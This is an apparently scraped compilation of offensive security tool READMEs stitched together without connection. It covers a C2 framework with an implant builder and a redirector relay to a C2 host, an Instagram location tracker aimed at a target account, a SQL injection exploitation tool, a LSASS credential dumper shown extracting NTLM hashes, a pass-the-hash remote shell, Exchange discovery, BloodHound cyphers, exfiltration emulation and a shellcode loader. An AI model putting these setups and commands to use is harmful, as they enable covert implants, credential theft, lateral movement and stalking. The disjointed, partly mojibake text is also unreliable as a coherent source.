UPLOAD_LOCATION=<directory to store uploaded files to (default: static)>
SSL_KEY=<your SSL key file (optional)>
SSL_CERT=<your SSL cert file (optional)>
Note that `SSL_KEY` and `SSL_CERT` are optional. If either is not defined, a plain HTTP server will be created. This helps avoid needless overhead when running the server behind an SSL-enabled reverse proxy on the same host.
$ node index.js
[12:45:30 PM] Connecting to backend database...
[12:45:31 PM] Starting HTTP server...
[12:45:31 PM] Server started on port: 3000
This is the web UI used by operators. It is a single page web application written in Svelte, and the source code is in the `frontend/` directory.
To setup the frontend;
$ cd frontend
$ npm install
Create a `.env` file with the variable `VITE_STRIKER_API` set to the full URL of the C2 server as configured above;

VITE_STRIKER_API=https://c2.striker.local
$ npm run build
The above will compile everything into a static web application in the `dist/` directory. You can move all the files inside into the web root of your web server, or even host it with a basic HTTP server like that of python;
$ cd dist
$ python3 -m http.server 8000
- Open the frontend in your browser and click the `Register` button.
- Sign up using the registration key you configured for the backend (`REGISTRATION_KEY` in `backend/.env`).

This will create a standard user account. You will need an admin account to access some features. Your first admin account must be created manually, afterwards you can upgrade and downgrade other accounts in the `Users` tab of the web UI.
To create your first admin account;
Connect to the database and, in the `users` collection, set the `admin` field of the target user to `true`;

There are different ways you can do this. If you have `mongo` available in your CLI, you can do it using;
$ mongo <your MongoDB connection URL>
> db.users.updateOne({username: "<your username>"}, {$set: {admin: true}})
You should get the following response if it works;
{ "acknowledged" : true, "matchedCount" : 1, "modifiedCount" : 1 }
You can now login :)
A) Dumb Pipe Redirection
A dumb pipe redirector written for Striker is available at `redirector/redirector.py`. Obviously, this will only work for plain HTTP traffic, or for HTTPS when SSL verification is disabled (you can do this by enabling the `INSECURE_SSL` macro in the C agent).
The following example listens on port `443` on all interfaces and forwards to `c2.example.org` on port `443`;
$ cd redirector
$ ./redirector.py 0.0.0.0:443 c2.example.org:443
[*] Starting redirector on 0.0.0.0:443...
[+] Listening for connections...
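A dumb pipe redirector is just a TCP relay that copies bytes in both directions between the victim-facing socket and the upstream C2. A minimal Python equivalent (a sketch of the concept; the bundled `redirector.py` may differ):

```python
# Minimal TCP relay sketch (illustrative; not necessarily how redirector.py is written)
import socket
import threading

def pipe(src: socket.socket, dst: socket.socket) -> None:
    try:
        while (data := src.recv(4096)):
            dst.sendall(data)
    except OSError:
        pass
    finally:
        src.close()
        dst.close()

def redirect(listen_addr, target_addr):
    server = socket.create_server(listen_addr)
    print(f"[*] Starting redirector on {listen_addr[0]}:{listen_addr[1]}...")
    while True:
        client, _ = server.accept()
        upstream = socket.create_connection(target_addr)
        threading.Thread(target=pipe, args=(client, upstream), daemon=True).start()
        threading.Thread(target=pipe, args=(upstream, client), daemon=True).start()

redirect(("0.0.0.0", 443), ("c2.example.org", 443))
```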
B) Nginx Reverse Proxy as Redirector
$ sudo apt install nginx
Create the nginx configuration file (e.g. `/etc/nginx/sites-available/striker`);

Placeholders;

- `<domain-name>` - This is your server's FQDN, and should match the one in your SSL cert.
- `<ssl-cert>` - The SSL cert file to use.
- `<ssl-key>` - The SSL key file to use.
- `<c2-server>` - The full URL of the C2 server to forward requests to.

WARNING: `client_max_body_size` should be as large as the size defined by `MAX_UPLOAD_SIZE` in your `backend/.env` file, or uploads for large files will fail.
server {
listen 443 ssl;
server_name <domain-name>;
ssl_certificate <ssl-cert>;
ssl_certificate_key <ssl-key>;
client_max_body_size 100M;
access_log /var/log/nginx/striker.log;
location / {
proxy_pass <c2-server>;
proxy_redirect off;
proxy_ssl_verify off;
proxy_read_timeout 90;
proxy_http_version 1.0;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection "upgrade";
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
}
}
$ sudo ln -s /etc/nginx/sites-available/striker /etc/nginx/sites-enabled/striker
$ sudo service nginx restart
Your redirector should now be up and running on port `443`, and can be tested using (assuming your FQDN is `striker.local`);
$ curl https://striker.local
If it works, you should get the 404 response used by the backend, like;
{"error":"Invalid route!"}
A) The C Agent
These are the implants used by Striker. The primary agent is written in C, and is located in `agent/C/`. It supports both linux and windows hosts. The linux agent depends externally on `libcurl`, which you will find installed in most systems.

The windows agent does not have an external dependency. It uses `wininet` for comms, which I believe is available on all windows hosts.
Assuming you're on a 64 bit host, the following will build for 64 bit hosts;
$ cd agent/C
$ mkdir bin
$ make
To build for 32 bit on 64;
$ sudo apt install gcc-multilib
$ make arch=32
The above compiles everything into the `bin/` directory. You will need only two files to generate working implants;

- `bin/stub` - This is the agent stub that will be used as template to generate working implants.
- `bin/builder` - This is what you will use to patch the agent stub to generate working implants.

The builder accepts the following arguments;
$ ./bin/builder
[-] Usage: ./bin/builder <url> <auth_key> <delay> <stub> <outfile>
Where;
- `<url>` - The server to report to. This should ideally be a redirector, but a direct URL to the server will also work.
- `<auth_key>` - The authentication key to use when connecting to the C2. You can create this in the auth keys tab of the web UI.
- `<delay>` - Delay between each callback, in seconds. This should be at least 2, depending on how noisy you want it to be.
- `<stub>` - The stub file to read, `bin/stub` in this case.
- `<outfile>` - The output filename of the new implant.
$ ./bin/builder https://localhost:3000 979a9d5ace15653f8ffa9704611612fc 5 bin/stub bin/striker
[*] Obfuscating strings...
[+] 69 strings obfuscated :)
[*] Finding offsets of our markers...
[+] Offsets:
URL: 0x0000a2e0
OBFS Key: 0x0000a280
Auth Key: 0x0000a2a0
Delay: 0x0000a260
[*] Patching...
[+] Operation completed!
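The patching step itself is conceptually simple: the stub carries fixed-size placeholder markers at known offsets, and the builder overwrites them with the URL, keys, and delay. A toy illustration of the idea in Python (the marker names and field sizes here are invented for the example, not Striker's actual stub format):

```python
# Toy illustration of stub patching (markers and sizes invented for the example)
def patch(stub_path: str, out_path: str, url: str, auth_key: str, delay: int) -> None:
    data = bytearray(open(stub_path, "rb").read())
    fields = (
        (b"__URL_MARKER__", url.encode(), 256),
        (b"__KEY_MARKER__", auth_key.encode(), 64),
        (b"__DLY_MARKER__", str(delay).encode(), 16),
    )
    for marker, value, size in fields:
        offset = data.find(marker)
        assert offset != -1, f"marker {marker!r} not found in stub"
        data[offset:offset + size] = value.ljust(size, b"\x00")  # pad field to fixed size
    with open(out_path, "wb") as f:
        f.write(data)

patch("bin/stub", "bin/striker", "https://localhost:3000", "979a9d5ace15653f8ffa9704611612fc", 5)
```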
You will need MinGW for this. The following will install the 32 and 64 bit dev windows environment;
$ sudo apt install mingw-w64
Build for 64 bit;
$ cd agent/C
$ mkdir bin
$ make target=win
To compile for 32 bit;
$ make target=win arch=32
This will compile everything into the `bin/` directory, and you will have the stub and the builder as `bin\stub.exe` and `bin\builder.exe`, respectively.
B) The Python Agent
Striker also comes with a self-contained python agent (tested on python 2.7.16 and 3.7.3). This is located at `agent/python/`. Only the most basic features are implemented in this agent. Useful for hosts that can't run the C agent but have python installed.

There are 2 files in this directory;

- `stub.py` - This is the payload stub to pass to the builder.
- `builder.py` - This is what you'll be using to generate an implant.

Usage example:
$ ./builder.py
[-] Usage: builder.py <url> <auth_key> <delay> <stub> <outfile>
# The following will generate a working payload as `output.py`
$ ./builder.py http://localhost:3000 979a9d5ace15653f8ffa9704611612fc 2 stub.py output.py
[*] Loading agent stub...
[*] Writing configs...
[+] Agent built successfully: output.py
# Run it
$ python3 output.py
After following the above instructions, Striker should now be ready for use. Kindly go through the usage guide. Have fun, and happy hacking!
If you like the project, consider helping me turn coffee into code!
Trackgram
Use Instagram location features to track an account
At this moment the usage of Trackgram is extremely simple:
1. Download this repository
2. Go through the installation steps
3. Change the parameters in the tracgram main method directly:
+ Mandatory:
- NICKNAME: your username on Instagram
- PASSWORD: your Instagram password
- OBJECTIVE: your objective username
+ Optional:
- path_to_csv: the path where the csv file will be stored, including the name
4. Execute it with python3 tracgram.py
Download with $ git clone https://github.com/initzerCreations/Tracgram
Install dependencies using pip install -r requirements.txt
Congrats! By now you should be able to run it: python3 tracgram.py
Provides a heatmap based on the location frequency
Markers displayed on the heatmap indicating:
Graph relating the post count for a specific location
Generate an easy-to-process .CSV file
Darkdump is a simple script written in Python 3.11 that allows users to enter a search term (query) in the command line, and darkdump will pull all the deep web sites relating to that query. Darkdump 2.0 is here, enjoy!
git clone https://github.com/josh0xA/darkdump
cd darkdump
python3 -m pip install -r requirements.txt
python3 darkdump.py --help
Example 1: python3 darkdump.py --query programming
Example 2: python3 darkdump.py --query="chat rooms"
Example 3: python3 darkdump.py --query hackers --amount 12
Darkdump Proxy: python3 darkdump.py --query bitcoin -p
____ _ _
| \ ___ ___| |_ _| |_ _ _____ ___
| | | .'| _| '_| . | | | | . |
|____/|__,|_| |_,_|___|___|_|_|_| _|
|_|
Developed By: Josh Schiavone
https://github.com/josh0xA
joshschiavone.com
Version 2.0
usage: darkdump.py [-h] [-v] [-q QUERY] [-a AMOUNT] [-p]
options:
-h, --help show this help message and exit
-v, --version returns darkdump's version
-q QUERY, --query QUERY
the keyword or string you want to search on the deepweb
-a AMOUNT, --amount AMOUNT
the amount of results you want to retrieve (default: 10)
-p, --proxy use darkdump proxy to increase anonymity
The developer of this program, Josh Schiavone, is not responsible for misuse of this data gathering tool. Do not use darkdump to navigate websites that take part in any activity that is identified as illegal under the laws and regulations of your government. May God bless you all.
MIT License
Copyright (c) Josh Schiavone
An advanced cross-platform tool that automates the process of detecting and exploiting SQL injection security flaws
- `pip3`
- Install the requirements: `python3 -m pip install --upgrade -r requirements.txt`
- Run `python3 setup.py install` or `python3 -m pip install -e .`
- You can now run Ghauri via the `ghauri --help` command.

You can download the latest version of Ghauri by cloning the GitHub repository.
git clone https://github.com/r0oth3x49/ghauri.git
- `--proxy`
- `-r file.txt`
- `--start 1 --stop 2`
- `--skip-urlencode`
Author: Nasir khan (r0ot h3x49)
usage: ghauri -u URL [OPTIONS]
A cross-platform python based advanced sql injections detection & exploitation tool.
General:
-h, --help Shows the help.
--version Shows the version.
-v VERBOSE Verbosity level: 1-5 (default 1).
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url URL Target URL (e.g. 'http://www.site.com/vuln.php?id=1').
-r REQUESTFILE Load HTTP request from a file
Request:
These options can be used to specify how to connect to the target URL
-A , --user-agent HTTP User-Agent header value
-H , --header Extra header (e.g. "X-Forwarded-For: 127.0.0.1")
--host HTTP Host header value
--data Data string to be sent through POST (e.g. "id=1")
--cookie HTTP Cookie header value (e.g. "PHPSESSID=a8d127e..")
--referer HTTP Referer header value
--headers Extra headers (e.g. "Accept-Language: fr\nETag: 123")
--proxy Use a proxy to connect to the target URL
--delay Delay in seconds between each HTTP request
--timeout Seconds to wait before timeout connection (default 30)
--retries Retries when the connection related error occurs (default 3)
--skip-urlencode Skip URL encoding of payload data
--force-ssl Force usage of SSL/HTTPS
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms DBMS Force back-end DBMS to provided value
--prefix Injection payload prefix string
--suffix Injection payload suffix string
Detection:
These options can be used to customize the detection phase
--level LEVEL Level of tests to perform (1-3, default 1)
--code CODE HTTP code to match when query is evaluated to True
--string String to match when query is evaluated to True
--not-string String to match when query is evaluated to False
--text-only Compare pages based only on the textual content
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique TECH SQL injection techniques to use (default "BEST")
--time-sec TIMESEC Seconds to delay the DBMS response (default 5)
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--hostname Retrieve DBMS server hostname
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
-D DB DBMS database to enumerate
-T TBL DBMS database tables(s) to enumerate
-C COLS DBMS database table column(s) to enumerate
--start Retrieve entries from offset for dbs/tables/columns/dump
--stop Retrieve entries till offset for dbs/tables/columns/dump
Example:
ghauri http://www.site.com/vuln.php?id=1 --dbs
Usage of Ghauri for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local,state and federal laws.
Developer assume no liability and is not responsible for any misuse or damage caused by this program.
A PoC that combines AutodialDLL lateral movement technique and SSP to scrape NTLM hashes from LSASS process.
Upload a DLL to the target machine. Then it enables Remote Registry to modify the AutodialDLL entry and start/restart the BITS service. Svchost would load our DLL, set AutodialDLL back to its default value and perform an RPC request to force LSASS to load the same DLL as a Security Support Provider. Once the DLL is loaded by LSASS, it would search inside the process memory to extract NTLM hashes and the key/IV.
The DllMain always returns `False` so the processes don't keep it.
It only works when `RunAsPPL` is not enabled. Also, I only added support to decrypt 3DES because I am lazy, but it should be easy peasy to add code for AES. For the same reason, I only implemented support for the following Windows versions:
Build | Support |
---|---|
Windows 10 version 21H2 | |
Windows 10 version 21H1 | Implemented |
Windows 10 version 20H2 | Implemented |
Windows 10 version 20H1 (2004) | Implemented |
Windows 10 version 1909 | Implemented |
Windows 10 version 1903 | Implemented |
Windows 10 version 1809 | Implemented |
Windows 10 version 1803 | Implemented |
Windows 10 version 1709 | Implemented |
Windows 10 version 1703 | Implemented |
Windows 10 version 1607 | Implemented |
Windows 10 version 1511 | |
Windows 10 version 1507 | |
Windows 8 | |
Windows 7 |
The signatures/offsets/structs were taken from Mimikatz. If you want to add a new version just check sekurlsa functionality on Mimikatz.
psyconauta@insulanova:~/Research/dragoncastle$ python3 dragoncastle.py -h
DragonCastle - @TheXC3LL
usage: dragoncastle.py [-h] [-u USERNAME] [-p PASSWORD] [-d DOMAIN] [-hashes [LMHASH]:NTHASH] [-no-pass] [-k] [-dc-ip ip address] [-target-ip ip address] [-local-dll dll to plant] [-remote-dll dll location]
DragonCastle - A credential dumper (@TheXC3LL)
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
valid username
-p PASSWORD, --password PASSWORD
valid password (if omitted, it will be asked unless -no-pass)
-d DOMAIN, --domain DOMAIN
valid domain name
-hashes [LMHASH]:NTHASH
NT/LM hashes (LM hash can be empty)
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter
-target-ip ip address
IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it
-local-dll dll to plant
DLL location (local) that will be planted on target
-remote-dll dll location
Path used to update AutodialDLL registry value
Windows server on 192.168.56.20 and Domain Controller on 192.168.56.10:
psyconauta@insulanova:~/Research/dragoncastle$ python3 dragoncastle.py -u vagrant -p 'vagrant' -d WINTERFELL -target-ip 192.168.56.20 -remote-dll "c:\dump.dll" -local-dll DragonCastle.dll
DragonCastle - @TheXC3LL
[+] Connecting to 192.168.56.20
[+] Uploading DragonCastle.dll to c:\dump.dll
[+] Checking Remote Registry service status...
[+] Service is down!
[+] Starting Remote Registry service...
[+] Connecting to 192.168.56.20
[+] Updating AutodialDLL value
[+] Stopping Remote Registry Service
[+] Checking BITS service status...
[+] Service is down!
[+] Starting BITS service
[+] Downloading creds
[+] Deleting credential file
[+] Parsing creds:
============
----
User: vagrant
Domain: WINTERFELL
----
User: vagrant
Domain: WINTERFELL
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: eddard.stark
Domain: SEVENKINGDOMS
NTLM: d977b98c6c9282c5c478be1d97b237b8
----
User: vagrant
Domain: WINTERFELL
NTLM: e02bc503339d51f71d913c245d35b50b
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: DWM-1
Domain: Window Manager
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: WINTERFELL$
Domain: SEVENKINGDOMS
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User: UMFD-0
Domain: Font Driver Host
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
NTLM: 5f4b70b59ca2d9fb8fa1bf98b50f5590
----
User:
Domain:
============
[+] Deleting DLL
[^] Have a nice day!
psyconauta@insulanova:~/Research/dragoncastle$ wmiexec.py -hashes :d977b98c6c9282c5c478be1d97b237b8 SEVENKINGDOMS/eddard.stark@192.168.56.10
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
sevenkingdoms\eddard.stark
C:\>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
C:\>
Juan Manuel Fernández (@TheXC3LL)
REST-Attacker is an automated penetration testing framework for APIs following the REST architecture style. The tool's focus is on streamlining the analysis of generic REST API implementations by completely automating the testing process - including test generation, access control handling, and report generation - with minimal configuration effort. Additionally, REST-Attacker is designed to be flexible and extensible with support for both large-scale testing and fine-grained analysis.
REST-Attacker is maintained by the Chair of Network & Data Security of Ruhr University Bochum.
REST-Attacker currently provides these features:
Get the tool by downloading or cloning the repository:
git clone https://github.com/RUB-NDS/REST-Attacker.git
You need Python 3.10+ to run the tool.
You also need to install the following packages with pip:
python3 -m pip install -r requirements.txt
Here you can find a quick rundown of the most common and useful commands. You can find more information on each command and the available configuration options in our usage guides.
Get the list of supported test cases:
python3 -m rest_attacker --list
Basic test run (with load-time test case generation):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate
Full test run (with load-time and runtime test case generation + rate limit handling):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --propose --handle-limits
Test run with only selected test cases (only generates test cases for scopes.TestTokenRequestScopeOmit and resources.FindSecurityParameters):
python3 -m rest_attacker <cfg-dir-or-openapi-file> --generate --test-cases scopes.TestTokenRequestScopeOmit resources.FindSecurityParameters
Rerun a test run from a report:
python3 -m rest_attacker <cfg-dir-or-openapi-file> --run /path/to/report.json
Usage guides and configuration format documentation can be found in the documentation subfolders.
For fixes/mitigations for known problems with the tool, see the troubleshooting docs or the Issues section.
Contributions of all kinds are appreciated! If you found a bug or want to make a suggestion or feature request, feel free to create a new issue in the issue tracker. You can also submit fixes or code amendments via a pull request.
Unfortunately, we can be very busy sometimes, so it may take a while before we respond to comments in this repository.
This project is licensed under GNU LGPLv3 or later (LGPL3+). See COPYING for the full license text and CONTRIBUTORS.md for the list of authors.
ExchangeFinder is a simple and open-source tool that tries to find Microsoft Exchange instances for a given domain based on the top common DNS names for Microsoft Exchange.
ExchangeFinder can identify the exact version of Microsoft Exchange, from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019.
ExchangeFinder will first try to resolve any subdomain that is commonly used for Exchange server, then it will send a couple of HTTP requests to parse the content of the response sent by the server to identify if it's using Microsoft Exchange or not.
Currently, the tool has a signature for every Microsoft Exchange version from Microsoft Exchange 4.0 to Microsoft Exchange Server 2019, and based on the build version sent by Exchange via the X-OWA-Version header it can identify the exact version.
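As a rough illustration of that header-based check (this is not ExchangeFinder's actual code; the hostname patterns and the build-to-version map below are illustrative placeholders):

```python
# Hedged sketch of an X-OWA-Version probe, assuming the requests library.
import requests
import urllib3

urllib3.disable_warnings()  # OWA endpoints frequently use self-signed certs

COMMON_HOSTS = ["mail.{d}", "autodiscover.{d}", "owa.{d}", "exchange.{d}"]
BUILD_MAP = {"15.1": "Exchange Server 2016", "15.2": "Exchange Server 2019"}  # example entries only

def probe(domain):
    for pattern in COMMON_HOSTS:
        host = pattern.format(d=domain)
        try:
            resp = requests.get(f"https://{host}/owa/", timeout=5, verify=False)
        except requests.RequestException:
            continue  # host does not resolve or is unreachable
        build = resp.headers.get("X-OWA-Version")
        if build:
            major = ".".join(build.split(".")[:2])
            print(f"{host}: build {build} -> {BUILD_MAP.get(major, 'unknown version')}")

probe("dummyexchangetarget.com")
```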
If the tool found a valid Microsoft Exchange instance, it will return the following results:
Clone the latest version of ExchangeFinder using the following command:
git clone https://github.com/mhaskar/ExchangeFinder
And then install all the requirements using the command poetry install.
┌──(kali㉿kali)-[~/Desktop/ExchangeFinder]
└─$ poetry install 1 ⨯
Installing dependencies from lock file
Package operations: 15 installs, 0 updates, 0 removals
• Installing pyparsing (3.0.9)
• Installing attrs (22.1.0)
• Installing certifi (2022.6.15)
• Installing charset-normalizer (2.1.1)
• Installing idna (3.3)
• Installing more-itertools (8.14.0)
• Installing packaging (21.3)
• Installing pluggy (0.13.1)
• Installing py (1.11.0)
• Installing urllib3 (1.26.12)
• Installing wcwidth (0.2.5)
• Installing dnspython (2.2.1)
• Installing pytest (5.4.3)
• Installing requests (2.28.1)
• Installing termcolor (1.1.0)
Installing the current project: ExchangeFinder (0.1.0)
┌──(kali㉿kali)-[~/Desktop/ExchangeFinder]
└─$ python3 exchangefinder.py
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[-] Please use --domain or --domains option
โโโ(kali 27;kali)-[~/Desktop/ExchangeFinder]
โโ$
You can use the option -h to show the help banner.
To scan a single domain, use the option --domain like the following:
askar•/opt/redteaming/ExchangeFinder(main⚡)» python3 exchangefinder.py --domain dummyexchangetarget.com
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[!] Scanning domain dummyexchangetarget.com
[+] The following MX records found for the main domain
10 mx01.dummyexchangetarget.com.
[!] Scanning host (mail.dummyexchangetarget.com)
[+] IIS server detected (https://mail.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.dummyexchangetarget.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
[!] Scanning host (autodiscover.dummyexchangetarget.com)
[+] IIS server detected (https://autodiscover.dummyexchangetarget.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://autodiscover.dummyexchangetarget.com Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://autodiscover.dummyexchangetarget.com/owa/auth/logon.aspx?url=https%3a%2f%2fautodiscover.dummyexchangetarget.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
askar•/opt/redteaming/ExchangeFinder(main⚡)»
To scan multiple domains (targets), use the option --domains and provide a file like the following:
askar•/opt/redteaming/ExchangeFinder(main⚡)» python3 exchangefinder.py --domains domains.txt
______ __ _______ __
/ ____/ __/ /_ ____ _____ ____ ____ / ____(_)___ ____/ /__ _____
/ __/ | |/_/ __ \/ __ `/ __ \/ __ `/ _ \/ /_ / / __ \/ __ / _ \/ ___/
/ /____> </ / / / /_/ / / / / /_/ / __/ __/ / / / / / /_/ / __/ /
/_____/_/|_/_/ /_/\__,_/_/ /_/\__, /\___/_/ /_/_/ /_/\__,_/\___/_/
/____/
Find that Microsoft Exchange server ..
[+] Total domains to scan are 2 domains
[!] Scanning domain externalcompany.com
[+] The following MX records found for the main domain
20 mx4.linfosyshosting.nl.
10 mx3.linfosyshosting.nl.
[!] Scanning host (mail.externalcompany.com)
[+] IIS server detected (https://mail.externalcompany.com)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.externalcompany.com
Exchange version : Exchange Server 2016 CU22 Nov21SU
Login page : https://mail.externalcompany.com/owa/auth/logon.aspx?url=https%3a%2f%2fmail.externalcompany.com%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/10.0
[!] Scanning domain o365.cloud
[+] The following MX records found for the main domain
10 mailstore1.secureserver.net.
0 smtp.secureserver.net.
[!] Scanning host (mail.o365.cloud)
[+] IIS server detected (https://mail.o365.cloud)
[!] Potential Microsoft Exchange Identified
[+] Microsoft Exchange identified with the following details:
Domain Found : https://mail.o365.cloud
Exchange version : Exchange Server 2013 CU23 May22SU
Login page : https://mail.o365.cloud/owa/auth/logon.aspx?url=https%3a%2f%2fmail.o365.cloud%2fowa%2f&reason=0
IIS/Webserver version: Microsoft-IIS/8.5
askar•/opt/redteaming/ExchangeFinder(main⚡)»
Please note that the examples used in the screenshots resolve in the lab only.
This tool is very simple and I was using it to save some time while searching for Microsoft Exchange instances; feel free to open a PR if you find any issue or have something new to add.
This project is licensed under the GPL-3.0 License - see the LICENSE file for details
A Python3 terminal application that contains 260+ Neo4j cyphers for BloodHound data sets.
BloodHound is a staple tool for every red teamer. However, there are some negative side effects based on its design. I will cover the biggest pain points I've experienced and what this tool aims to address:
- BloodHound produces JSON graphs; I need graph results in a line-by-line format .txt file
This tool can also help blue teams reveal detailed information about their Active Directory environments as well.
Take back control of your BloodHound data with cypherhound!
Features include cypher output in a grep/cut/awk-friendly format.
Make sure to have python3 installed and run:
python3 -m pip install -r requirements.txt
Start the program with: python3 cypherhound.py -u <neo4j_username> -p <neo4j_password>
The full command menu is shown below:
Command Menu
set - used to set search parameters for cyphers, double/single quotes not required for any sub-commands
sub-commands
user - the user to use in user-specific cyphers (MUST include @domain.name)
group - the group to use in group-specific cyphers (MUST include @domain.name)
computer - the computer to use in computer-specific cyphers (SHOULD include .domain.name or @domain.name)
regex - the regex to use in regex-specific cyphers
example
set user svc-test@domain.local
set group domain admins@domain.local
set computer dc01.domain.local
set regex .*((?i)web).*
run - used to run cyphers
parameters
cypher number - the number of the cypher to run
example
run 7
export - used to export cypher results to txt files
parameters
cypher number - the number of the cypher to run and then export
output filename - the name of the output file, extension not needed
raw - write raw output or just end object (optional)
example
export 31 results
export 42 results2 raw
list - used to show a list of cyphers
parameters
list type - the type of cyphers to list (general, user, group, computer, regex, all)
example
list general
list user
list group
list computer
list regex
list all
q, quit, exit - used to exit the program
clear - used to clear the terminal
help, ? - used to display this help menu
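For context, these cyphers run against the same Neo4j database that BloodHound itself uses. Below is a minimal sketch of that idea using the official neo4j Python driver; it is not cypherhound's code, and the URI, credentials and cypher are placeholders:

```python
# Illustrative only: run one BloodHound-style cypher and print results
# line-by-line (grep/cut/awk-friendly), as cypherhound's export does.
from neo4j import GraphDatabase

driver = GraphDatabase.driver("bolt://localhost:7687", auth=("neo4j", "neo4j_password"))

# Example cypher: members of a specific group
query = """
MATCH (u:User)-[:MemberOf]->(g:Group {name: $group})
RETURN u.name AS member
"""

with driver.session() as session:
    for record in session.run(query, group="DOMAIN ADMINS@DOMAIN.LOCAL"):
        print(record["member"])  # one result per line

driver.close()
```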
Notes:
- Requires a running Neo4j database and URI
- Written for BloodHound 4.2.0; certain edges will not work for previous versions
- Windows users must run pip3 install pyreadline3
- Some cyphers cannot be exported (raw or not) due to their unpredictable number of nodes
- Azure edges are not included yet
Please be descriptive with any issues you decide to open and if possible provide output (if applicable).
A project created with an aim to emulate and test exfiltration of data over different network protocols. The emulation is performed without the use of native APIs. This will help blue teams write correlation rules to detect any type of C2 communication or data exfiltration.
Currently, this project can help generate HTTP/HTTPS traffic (both GET and POST) using the below-mentioned programming/scripting languages:
Download the latest ZIP from releases.
With SSL: python3 HTTP-S-EXFIL.py ssl
Without SSL: python3 HTTP-S-EXFIL.py
CNet.exe <Server-IP-ADDRESS> - Select any option
ChashNet.exe <Server-IP-ADDRESS> - Select any option
.\PowerHttp.ps1 -ip <Server-IP-ADDRESS> -port <80/443> -method <GET/POST>
laZzzy is a shellcode loader that demonstrates different execution techniques commonly employed by malware. laZzzy was developed using different open-source header-only libraries.
Features:
- Native (Nt*) functions (not all functions but most)
